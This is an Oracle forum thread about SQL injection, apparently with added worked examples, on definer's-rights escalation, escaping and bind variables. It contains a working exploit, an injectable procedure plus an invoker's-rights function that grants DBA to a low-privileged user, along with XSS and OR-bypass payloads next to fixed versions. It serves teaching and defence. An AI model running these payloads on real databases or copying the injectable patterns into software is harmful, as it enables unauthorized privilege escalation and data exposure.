[ask] about oracle sql injection and escalation

Hello, I'm a student studying Oracle. Now I want to research Oracle SQL injection. I have read some tutorials such as *'Hacking Oracle From Web', 'Advanced SQL Injection In Oracle Databases', 'Oracle Hacker HandBook' ...* but when I try to demo it on my local server (11.0.1.6) it does not run. This is my demo:
-- first, I created table users
create table users (name nvarchar2(50), pass nvarchar2(50));

-- then I created a procedure as the SYSTEM user
create or replace procedure system.adduser(u nvarchar2, p nvarchar2)
as
begin
  -- u and p are bind variables of a static INSERT
  insert into users values (u, p);
end;
/

-- grant execute privilege to the oc user
grant execute on adduser to oc;

-- log in as user oc and create a procedure
create or replace procedure sqli
as
begin
  execute immediate 'grant dba to oc';
end;
/

-- and then, I run system's procedure
declare
begin
  system.adduser('admin', 'admin'' ; execute immediate  ''declare begin sqli() end;');
end;
/
I hope an Oracle master can help me understand this and improve my knowledge.
Thanks
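The setup in the post, as an added example that is not code from the post or from the books it cites. It keeps the post's SYSTEM-owned schema, the low-privileged user OC and the USERS table, and adds three hypothetical names, ADDUSER_SAFE, ADDUSER_VULN and SQLI_FN, to put an injectable procedure next to the non-injectable shape the post uses. Parameters are VARCHAR2 rather than the post's NVARCHAR2; the type does not change the point. Run the first part as SYSTEM and the second as OC, in SQL*Plus.

```sql
---------------------------------------------------------------------------
-- Added example (not from the post). Run this part as SYSTEM.
---------------------------------------------------------------------------

-- Not injectable. U and P are bind variables of a static INSERT: the values
-- reach the SQL engine as data and are never parsed, so a quote or a ';'
-- inside P lands in the PASS column unchanged. This is the shape of ADDUSER
-- in the post, which is why the payload there does nothing.
CREATE OR REPLACE PROCEDURE adduser_safe (u VARCHAR2, p VARCHAR2)
AS
BEGIN
  INSERT INTO users (name, pass) VALUES (u, p);
END;
/

-- Injectable. The parameters are concatenated into statement text that
-- EXECUTE IMMEDIATE parses at run time. The procedure is definer's rights
-- (the default), so whatever ends up in that text runs as SYSTEM.
CREATE OR REPLACE PROCEDURE adduser_vuln (u VARCHAR2, p VARCHAR2)
AS
BEGIN
  EXECUTE IMMEDIATE
    'INSERT INTO users (name, pass) VALUES (''' || u || ''', ''' || p || ''')';
END;
/

GRANT EXECUTE ON adduser_safe TO oc;
GRANT EXECUTE ON adduser_vuln TO oc;

---------------------------------------------------------------------------
-- Run this part as OC.
---------------------------------------------------------------------------

-- Chaining a second statement with ';' (the approach in the post) fails even
-- against ADDUSER_VULN: EXECUTE IMMEDIATE takes one SQL statement or one
-- PL/SQL block, so the server rejects the string with a syntax error. What
-- can be injected into an INSERT is an expression, including a call to a
-- function the attacker owns.
--
-- AUTHID CURRENT_USER makes the function run as whoever invokes it. When the
-- invoker is SYSTEM's definer's-rights procedure, that is SYSTEM. The
-- autonomous transaction is needed because DDL is otherwise not permitted
-- in a function called from a running INSERT.
CREATE OR REPLACE FUNCTION sqli_fn RETURN VARCHAR2
AUTHID CURRENT_USER
AS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO oc';
  COMMIT;
  RETURN '';
END;
/
-- SYSTEM has to be allowed to call the function. Privileges that come only
-- through a role are not available inside definer's-rights code, so a grant
-- to PUBLIC is the simplest way.
GRANT EXECUTE ON sqli_fn TO PUBLIC;

-- Against the safe procedure the payload is stored as data: the new row's
-- PASS column holds the literal text  ' || oc.sqli_fn() || '  and SQLI_FN
-- is never called.
EXEC system.adduser_safe('admin', ''' || oc.sqli_fn() || ''');

-- Against the vulnerable procedure the statement SYSTEM executes becomes
--   INSERT INTO users (name, pass) VALUES ('admin', '' || oc.sqli_fn() || '')
-- so SQLI_FN runs during the INSERT, as SYSTEM.
EXEC system.adduser_vuln('admin', ''' || oc.sqli_fn() || ''');

-- Whether the GRANT itself succeeds depends on what the procedure owner
-- holds directly, not through roles. Check before assuming SYSTEM has
-- GRANT ANY ROLE as a direct grant, then look for the new role:
--   SELECT privilege    FROM dba_sys_privs  WHERE grantee = 'SYSTEM';  -- as a DBA
--   SELECT granted_role FROM user_role_privs;                          -- as OC
```

The line that matters is AUTHID CURRENT_USER: a definer's-rights procedure runs as its owner, and an invoker's-rights function it calls inherits that identity, which is what turns an injection into SYSTEM's code into SYSTEM's privileges. Oracle 12c added the INHERIT PRIVILEGES privilege to make that inheritance something the more privileged party has to allow; on 11g, the version in the post, no such check exists.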


Similar Messages

  • A silly question about oracle.sql.timestamp and java.sql.timestamp

    Hi,
    I'm looking at a method that takes objects of type Object and does stuff if the object is really a java.sql.Timestamp. If it is not, then an error is flagged. In my case it flags an error when an object of type oracle.sql.timestamp is passed to it. Not being entirely comfortable with Java (I'm still learning it), here's my stupid question: why isn't oracle.sql.timestamp a subclass of java.sql.timestamp? Also, various books indicate that java.sql.timestamp maps to oracle.sql.timestamp. Does that mean you have to physically do the mapping:
    i.e.
    java.sql.Timestamp t = new oracle.sql.TIMESTAMP(currentTimestamp).timestampValue(); // currentTimestamp is a java.sql.Timestamp; timestampValue() throws SQLException
    or is there something else to it.
    Thanks.
    Harold.

    The best forum for this is probably Forum Home » Java » SQLJ/JDBC.
    Presumably you are referring to oracle.sql.TIMESTAMP. While this is intended to (and does) correspond to java.sql.Timestamp, it can't be a subclass because it needs to be a subclass of oracle.sql.Datum.

  • SQL Injections and XSS - Escaping Special Characters

    Hi, hope someone can help in regards to security and SQL Injections and XSS.
    We are using APEX 4.0.2 on Oracle 11.2.0.2.
    1. It seems the special characters we have entered into normal 'Text Items', 'Text Areas' etc. are not being escaped (i.e. <, >, &, '). If I enter them into a field (e.g. Surname) they are saved as-is into session state and the database, with no escaping. Am I missing something such as an environment setting, as I thought the "smart" Oracle escaping rules would cater for this?
    Surely I don't have to manually do each of them.
    Just to confirm, am I looking in the correct places to assess whether the characters are escaped or not, i.e. should they show as '&amp;&lt;&gt;' in session state and/or the database?
    2. Also, for the Oracle procedures such as 'wwv_flow.accept', 'wwv_flow.show', 'wwv_flow_utilities.show_as_popup_calendar': do these escape special characters? If not, then they must be vulnerable to SQL injection attacks.
    Thx
    Nigel

    Recx Ltd wrote:
    Just to pitch in, escaping values internally (either in the database or session state) is extremely problematic. Data searches, string comparison, reporting and double escaping are all areas which suffer badly when you do this.
    Stripping characters on input can also cause problems if not considered within the context of the application. Names such as "O'Niel", statistical output such as "n < 300", and fields containing deliberate HTML markup can be annoying to debug. In certain situations stripping is totally ineffective and may still lead to cross-site scripting.
    APEX applications that share the database with other applications will also be affected.
    The database should contain 'raw' unfettered data and output should be escaped properly, as Joel said, at render time, either with APEX attributes or using PL/SQL functions such as htf.escape_sc() as and when required.
    Shameless plug: if you are in the game of needing to produce secure APEX code, you should get in touch.

    Moderator: Do not needlessly resurrect old threads. After a couple of months watches expire and the original posters are not alerted to the presence of your follow-up.
    Moderator: This crosses the line into spam: it violates the OTN Terms of Use, see 6(j). Promotional posts like this are liable to be removed by the moderators.
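The point about escaping on input versus escaping at render time, as an added example that is not code from the thread. It uses a hypothetical table DEMO_PEOPLE, constructed sample values, and the OWA function htf.escape_sc that the reply names; run it in SQL*Plus with SET SERVEROUTPUT ON.

```sql
-- Added example (not from the thread). Hypothetical table: one column keeps
-- the value as entered, the other escapes it on input, the approach the
-- reply above argues against.
CREATE TABLE demo_people (
  surname_raw     VARCHAR2(100),
  surname_escaped VARCHAR2(100)
);

-- Constructed sample values. Both are legitimate data, not attacks.
INSERT INTO demo_people VALUES ('O''Niel', htf.escape_sc('O''Niel'));
INSERT INTO demo_people VALUES ('n < 300', htf.escape_sc('n < 300'));
COMMIT;

-- 1. Searching. A user types  n < 300  into a search box. The raw column
--    matches the row; the escaped column does not, because it holds the
--    string  n &lt; 300 . Every comparison and report against that column
--    now has to know about the escaping.
SELECT COUNT(*) AS raw_hits     FROM demo_people WHERE surname_raw     = 'n < 300';
SELECT COUNT(*) AS escaped_hits FROM demo_people WHERE surname_escaped = 'n < 300';

-- 2. Rendering. Escape once, when the value is written into the page. The
--    raw column comes out as  n &lt; 300  and the browser shows  n < 300 .
--    Escaping the already-escaped column turns its &lt; into &amp;lt; and
--    the browser shows the literal text  n &lt; 300 : the double-escaping
--    problem the reply mentions.
SELECT htf.escape_sc(surname_raw)     AS rendered_once,
       htf.escape_sc(surname_escaped) AS rendered_twice
  FROM demo_people;

-- 3. Why the rule is "escape at render time" and not "never escape": the
--    same raw value written into HTML unescaped is the cross-site scripting
--    path, and a single escape at output closes it.
DECLARE
  l_input VARCHAR2(200) := '<script>alert(1)</script>';  -- constructed payload
BEGIN
  DBMS_OUTPUT.PUT_LINE('unsafe: <td>' || l_input || '</td>');
  DBMS_OUTPUT.PUT_LINE('safe:   <td>' || htf.escape_sc(l_input) || '</td>');
END;
/
```

In APEX terms, step 3 is what the "Escape special characters" attribute on a report column does for you; the example only makes visible what happens when the same job is done on the way in instead.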

  • About Oracle SQL Certification Details

    Hi All,
    I want details about Oracle SQL certification. How many types are there and what are they?
    Thanks & Regards

    You will get better answers in the [Oracle Certification Forum|http://forums.oracle.com/forums/forum.jspa?forumID=459]
    Thanks,
    Karthick.

  • Oracle.sql.BLOB and oracle.sql.STRUCT

    I'm developing an application in Java with Oracle to manage media files. When I try to insert into Oracle, I get this problem: "oracle.sql.BLOB cannot be cast to oracle.sql.STRUCT", and I don't know what it can be..
    This is my code, please help with that.. If you have sample code for Java and Oracle to insert media, that will be a great help..
    import java.io.FileInputStream;
    import java.sql.Statement;
    import oracle.jdbc.OracleConnection;
    import oracle.jdbc.OraclePreparedStatement;
    import oracle.jdbc.OracleResultSet;
    import oracle.ord.im.OrdVideo;

    public void loadDataFromStream(OracleConnection con) {
        try {
            Statement s = con.createStatement();
            OracleResultSet rs = (OracleResultSet)
                s.executeQuery("select * from blobs where id='video2.avi' for update ");
            String index = "";
            while (rs.next()) {
                index = rs.getString(1);
                index += "1";
                System.out.println("got this far");
                // the error is on the line below ...
                // getCustomDatum expects column 2 to hold an ORDVideo object (a STRUCT);
                // the exception says the column actually holds a plain BLOB
                OrdVideo vidObj = (OrdVideo) rs.getCustomDatum(2, OrdVideo.getFactory());
                // rs.getBfile(3);
                FileInputStream fStream = new FileInputStream("/home/jova/movie.avi");
                vidObj.loadDataFromInputStream(fStream);
                vidObj.getDataInFile("/home/jova/movie.avi");
                fStream.close();
                System.out.println(" getContentLength output : " + vidObj.getContentLength());
                // index is concatenated into the statement text rather than bound
                OraclePreparedStatement stmt1 = (OraclePreparedStatement)
                    con.prepareCall("update blob_col set image = ? where id = " + index);
                stmt1.setCustomDatum(1, vidObj);
                stmt1.execute();
                stmt1.close();
                index += "1";
                System.out.println("OK");
            }
        } catch (Exception e) {
            System.out.println("exception raised " + e);
            System.out.println("load data from stream unsuccessful");
        }
    }


  • XML Validation using java for SQL Injection and script validation

    I have input coming from an XML file.
    I have to read that input and validate it against SQL injection and scripts.
    I need help now on how to read this XML data and validate it against the above two things.
    I am a Java developer.
    In this context, what is marshalling?

    http://www.ibm.com/developerworks/library/x-javaxmlvalidapi.html?ca=dgr-lnxw07Java-XML-Val
    http://java.sun.com/j2se/1.5.0/docs/api/javax/xml/validation/package-summary.html
    The following code validates the XML against an XML schema:
    import javax.xml.transform.stream.StreamSource;
    import javax.xml.validation.Schema;
    import javax.xml.validation.SchemaFactory;
    import javax.xml.validation.Validator;

    // define the type of schema - we use W3C:
    String schemaLang = "http://www.w3.org/2001/XMLSchema";
    SchemaFactory factory = SchemaFactory.newInstance(schemaLang);
    Schema schema = factory.newSchema(new StreamSource("sample.xsd"));
    Validator validator = schema.newValidator();
    // at last perform validation; throws SAXException if sample.xml does not conform to the schema:
    validator.validate(new StreamSource("sample.xml"));
    Message was edited by: haishai

  • SQL Injection and cfqueryparam

    I was told to look into <cfqueryparam> to assist in fighting SQL injection, and it makes perfect sense, up until I thought of a different scenario...
    This tag seems great when you are dealing with numbers or text where you can restrict the number of characters, but what if you have a textarea that allows for a large amount of text to be entered? I.e. a search field for records that uses keywords.
    How do you stop someone from entering damaging SQL into an area that accepts this?
    Thanks for any education.
    Wally Kolcz
    MyNextPet.org
    Founder / Developer
    586.871.4126

    WebDev wrote:
    It works because <cfqueryparam ....> tells the DBMS that this data is a value, NOT SQL. The DBMS will then never process it as SQL. When you write the SQL and values straight into the code, then the DBMS does not know what is what and assumes it all must be SQL.
    An example...
    <cfquery ....>
    SELECT aField FROM aTable WHERE aField = '#aValue#'
    </cfquery>
    With this code, ColdFusion processes the entire body of the <cfquery...> tag into a string and sends that entire string to the DBMS as SQL. The DBMS then processes what it was given. If somebody can modify the aValue variable to change the SQL string, that is what is processed.
    <cfquery ...>
    SELECT aField FROM aTable WHERE aField = <cfqueryParam value="#aValue#"...>
    </cfquery>
    With this code ColdFusion processes the SQL and the queryParam as separate things. It sends the DBMS the SQL with parameters and a list of values to be used in those parameters. The DBMS knows the parameters are not SQL and will not process them as SQL, and if the parameter contains SQL it will just be used as a value and not parsed.
    FYI... that is how <cfqueryparam...> can improve performance. By knowing what parts of the SQL are variables, it can cache the SQL and just use different variables when they are passed to the DBMS.
    HTH
    Ian

  • Oracle SQL*Net and TNS Protocol

    I need to get technical documents on Oracle SQL*Net and the TNS protocol, down to the bit-level definition. I have talked to several people in Oracle Documentation, Sales and Tech Support, but no one could give me any clue so far. Can anyone help me with this?

    SQL*Net is installed by default with SQL*Plus and any of the clients (OEM uses the JDBC OCI driver and some native connectivity).
    It is likely that the version of the client you have installed is not one that TOAD can work with or it can't find the client (is the Oracle home/bin directory in the path?)

  • Error oracle.sql.* and oracle.jdbc.driver.* not found when using oracle as a database

    I am using Oracle as the database and WebLogic 4.5. I have copied the classes12.zip file into the lib directory of WebLogic. I am getting the error that oracle.sql.* and oracle.jdbc.driver.* are not found when I import these packages in a JSP file. What do I need to do to import the Oracle driver packages? I put it in the classpath also.
    Please advise!
    Thanks in advance
    AnuPama

    Hi Anupama,
    First of all, I would be surprised if you would not like to use the connection pooling feature of WebLogic (in which case you might not need to import the classes directly) and would rather open direct connections to your database. Anyway, for doing that I would recommend you check out the readme doc that ships
    along with the Oracle JDBC driver (classes12.zip etc.). I am giving an excerpt here:
    These are a few simple things that you should do in your JDBC program:
    1. Import the necessary JDBC classes in your programs that use JDBC.
    For example:
    import java.sql.*;
    import java.math.*;
    2. Register the Oracle driver before calling other JDBC APIs.
    (This is not needed if you are using the JDBC Server-side Internal
    Driver because registration is done automatically in the server.)
    To register the Oracle driver, make sure the following statement
    is executed at least once in your Java session:
    DriverManager.registerDriver(
    new oracle.jdbc.driver.OracleDriver());
    3. Open a connection to the database with the getConnection call.
    Different connection URLs should be used for different JDBC
    drivers. The following examples demonstrate the different URLs.
    For the JDBC OCI8 Driver:
    Connection conn = DriverManager.getConnection(
    "jdbc:oracle:oci8:@<database>",
    "scott", "tiger");
    where <database> is either an entry in tnsnames.ora or a SQL*net
    name-value pair.
    For the JDBC Thin Driver, or Server-side Thin Driver:
    Connection conn = DriverManager.getConnection(
    "jdbc:oracle:thin:@<database>",
    "scott", "tiger");
    where <database> is either a string of the form
    <host>:<port>:<sid> or a SQL*net name-value pair.
    For the JDBC Server-side Internal Driver:
    Connection conn = DriverManager.getConnection(
    "jdbc:oracle:kprb:");
    Note that the trailing ':' character is necessary. When you use
    the Server-side Internal Driver, you always connect to the
    database you are executing in. You can also do this:
    Connection conn
    = new oracle.jdbc.driver.OracleDriver().defaultConnection();
    Hope this helps,
    Thanks,
    Anupama wrote:
    I am using Oracle as the database and WebLogic 4.5. I have copied the classes12.zip file into the lib directory of WebLogic. I am getting the error that oracle.sql.* and oracle.jdbc.driver.* are not found when I import these packages in a JSP file. What do I need to do to import the Oracle driver packages? I put it in the classpath also.
    Please advise!
    Thanks in advance
    AnuPama
    --
    Apurb Kumar

  • I want to buy a MacBook Pro but I'm wondering about the keyboard: could the Mac shop change the keyboard to an Arabic keyboard? I want to buy 2 laptops. I have friends in the USA who visited the Apple store and asked about changing the keyboard, and they said OK

    I want to buy a MacBook Pro but I'm wondering about the keyboard: could the Mac shop change the keyboard to an Arabic keyboard? I want to buy 2 laptops. I have friends in the USA who visited the Apple store and asked about changing the keyboard, and they (the Apple store) said OK, so I don't know about the Australian store.
    I'm a student and my uni (University of New England) gives me a 10% discount on each. Thanks

    alifromarmidale wrote:
    I need the keyboard English with Arabic. Thanks
    These are user-to-user technical assistance forums, and nobody here represents Apple or any store. In order to find out whether you can buy something at a particular store, you really need to find some way to contact the store directly.

  • I have few questions to ask about the Expert Series and Valet Series

    Hello.
    I have few questions to ask about the Expert Series and Valet Series.
    1. I see there aren't any print servers/bridges/access points for these two new series. Do I have to use the previous ones? Or are new ones planned for the near future?
    2. Do I "HAVE TO USE THE CONNECT SOFTWARE"? Can I just use the web interface to do every setting that these routers feature?
    3. Do Expert Series routers support guest network and parental controls?
    4. When I look into information on these routers, some don't give information about backward compatibility with older standards. Should I take that to mean they are backward compatible with older standards?
    OK, that's all for now.
    If I need to ask more questions I will do that in this thread as a reply.

    With the new Expert or Valet Series router, you can still use the print server / bridge and access points.
    With the Expert and Valet Series routers, you have the option to use the Cisco Connect software or the web interface of the router. But with the Cisco Connect software you have the advantage of creating a guest account and using parental controls, which is not available using the web interface.
    Both routers are backward compatible and they can connect to your G Series products.

  • Oracle SQL Developer and Errors (Line Number Incorrect)

    First, I wanted to state that Oracle SQL Developer 2 is a standout job.
    I wanted to report, though, that when Oracle SQL Developer 2 can't compile a block of code or a simple SQL statement has invalid syntax, it does not have an option to accurately go to the line of code in question. GOING TO the erroneous line of code doesn't need to be a feature, but often the line no. REPORTED by Oracle SQL Developer is off by 50+ lines.
    Is this something I could fix on my end? I have five other developers griping about this.
    Thank you!

    I don't know if this is the situation you are talking about, but line numbers for errors in SQL in a SQL Worksheet are not line numbers within the statement but rather line numbers in the worksheet. For example, with the following SQL in the worksheet:
    select * from dual;
    select * from dual;
    select * from dual;
    select from dual;
    Running the "select from dual;" statement (as either statement based on cursor position, selected statement or as script), the error is reported on Line 4, Column 7. As I show line numbers (Tools | Preferences | Code Editor | Line Gutter | Show Line Numbers), this makes sense. Without line numbers showing or having the option to go to the error, and with more realistic examples with SQL statements scrolling off the page, I can see that the line number in the errors wouldn't be helpful.
    I think -K- is talking about the PL/SQL code editors not reporting the correct line number based on the error line not counting the "create or replace" line at the start of a package (and more for triggers).
    theFurryOne

  • Oracle sql developer and access db

    Hi All,
    I have connections to Oracle and Access DBs in my Oracle SQL Developer.
    When I try to create a database link from the Oracle DB to the Access DB I have to add a Host Name.
    The connection details to Access look like this:
    @jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\ list.mdb;DriverID=22;READONLY=false}
    I tried different variants, but it doesn't work.
    Is it possible to create a database link to an Access DB, and if yes, what do I have to add for the host name and what is the syntax for the cross table?
    Thank you

    Good documentation here... http://www.orafaq.com/node/60
    TimS

  • SQL Injection and variable substitutions

    Hello helpful forum, I'm trying to understand what really goes on "behind the scenes" with the variable substitutions in order to protect from SQL injection.
    I'm using APEX 3.0.0.00.20.
    The trickiest component seems to be a Report of type "PL/SQL returning SQL", since multiple dynamic SQL interpretations are done there.
    Consider the following innocent-looking disaster:
    DECLARE
      l_out VARCHAR2(2000);
    BEGIN
      l_out := 'select * from test_injection t where t.name like ''%' || :NAME || '%''';
      RETURN l_out;
    END;
    If NAME is a single quote the report will return:
    failed to parse SQL query: ORA-00911: invalid character
    which hints at the fact that NAME is not escaped, and you are in fact able to access DB functions, as in: '||lower('S')||'
    I also tried to put there a function that runs in an autonomous transaction to log its calls, and I see that it's called five times for each request.
    Consider now the similar solution (notice the two single quotes):
    DECLARE
      l_out VARCHAR2(2000);
    BEGIN
      l_out := 'select * from test_injection t where t.name like ''%'' || :NAME || ''%''';
      RETURN l_out;
    END;
    With this second example nothing of the above is possible.
    So my theory (please confirm or refute it) is that there is a first variable substitution done at the PL/SQL level (and in the second case :NAME is just a string, so nothing is substituted). Then the dynamic SQL is executed and it returns the following string:
    select * from test_injection t where t.name like '%' || :NAME || '%'
    Now another substitution is done (at an "APEX" level) and then the query is finally executed to return the rows to the report.
    The tricky point seems to be that the first substitution doesn't escape the variable (hence the error with the single quote), while the second substitution does.
    Please let me know if this makes sense and what the proper guidelines are to avoid SQL injection with the different kinds of reports and components (SQL, PL/SQL returning SQL, processes, ...).
    Thanks

    Giovanni,
    You should build report regions like this using the second method so that all bind variables (colon followed by name) appear in the resultant varchar2 variable, l_out in your example, which will then be parsed as the report query. This addresses not only the SQL injection problem but the shared-pool friendliness problem.
    Scott

  • SQL Injection and Java Regular Expression: How to match words?

    Dear friends,
    I am handling SQL injection attacks on our application with Java regular expressions. I use them to check whether malicious characters or keywords have been injected into the parameter value.
    The denied characters and keywords can be " ' ", " ; ", "insert", "delete" and so on. The expression I wrote is String pattern_str="('|;|insert|delete)+".
    I know it is not correct. It cannot be used to match only the whole words insert or delete. Each character in the two words can be matched and it is not what I want. Do you have any idea how to match only the whole word?
    Thanks,
    Ricky
    Edited by: Ricky Ru on 28/04/2011 02:29

    Avoid dynamic sql, avoid string concatenation and use bind variables and the risk is negligible.
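The advice the cfqueryparam, APEX "PL/SQL returning SQL" and regular-expression threads above converge on (pass user input as a parameter, keep the statement text constant, do not try to blacklist), as an added PL/SQL example that is not code from any of the posts. It uses a hypothetical table DEMO_ITEMS and two hypothetical functions, SEARCH_CONCAT and SEARCH_BIND; the payload is constructed. EXECUTE IMMEDIATE ... USING is the PL/SQL equivalent of cfqueryparam, and of leaving :NAME in the query text that APEX parses.

```sql
-- Added example (not from the threads). Constructed data: one row a search
-- should return and one it must not.
CREATE TABLE demo_items (name VARCHAR2(100), is_public NUMBER(1));
INSERT INTO demo_items VALUES ('public widget', 1);
INSERT INTO demo_items VALUES ('secret widget', 0);
COMMIT;

-- Vulnerable: the keyword is spliced into the statement text. A quote in the
-- input closes the LIKE literal and everything after it is parsed as SQL.
CREATE OR REPLACE FUNCTION search_concat (p_keyword VARCHAR2) RETURN NUMBER
AS
  l_count NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM demo_items WHERE is_public = 1 AND name LIKE ''%'
    || p_keyword || '%'''
    INTO l_count;
  RETURN l_count;
END;
/

-- Fixed: the statement text never changes; the keyword travels as a bind
-- value and is compared as data, never parsed. Length does not matter, so a
-- large textarea is no harder to handle than a number. Constant text also
-- means one shared-pool entry instead of a hard parse per distinct input.
CREATE OR REPLACE FUNCTION search_bind (p_keyword VARCHAR2) RETURN NUMBER
AS
  l_count NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM demo_items WHERE is_public = 1 AND name LIKE :kw'
    INTO l_count
    USING '%' || p_keyword || '%';
  RETURN l_count;
END;
/

SET SERVEROUTPUT ON
DECLARE
  -- Constructed payload. Its only character a blacklist such as
  -- ('|;|insert|delete) would flag is the quote, which is also the quote in
  -- a legitimate surname like O'Niel; where the input lands in a numeric
  -- comparison instead of a string literal, no quote is needed at all.
  l_payload VARCHAR2(100) := 'widget'' OR ''1%''=''1';
BEGIN
  -- Concatenated, the WHERE clause becomes
  --   is_public = 1 AND name LIKE '%widget' OR '1%'='1%'
  -- AND binds tighter than OR, and the OR branch is always true, so the
  -- is_public filter is bypassed and the secret row is counted too.
  DBMS_OUTPUT.PUT_LINE('concat: ' || search_concat(l_payload));

  -- Bound, the whole payload is matched literally against NAME. No name
  -- contains a quote, so nothing matches.
  DBMS_OUTPUT.PUT_LINE('bind:   ' || search_bind(l_payload));

  -- Ordinary use of the fixed version: only the public row matches.
  DBMS_OUTPUT.PUT_LINE('bind:   ' || search_bind('widget'));
END;
/
```

Whatever the front end is (ColdFusion, APEX, JDBC), the test is the same: the text sent to the parser must not change with the input. If it does, no amount of keyword matching on the input makes it safe.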
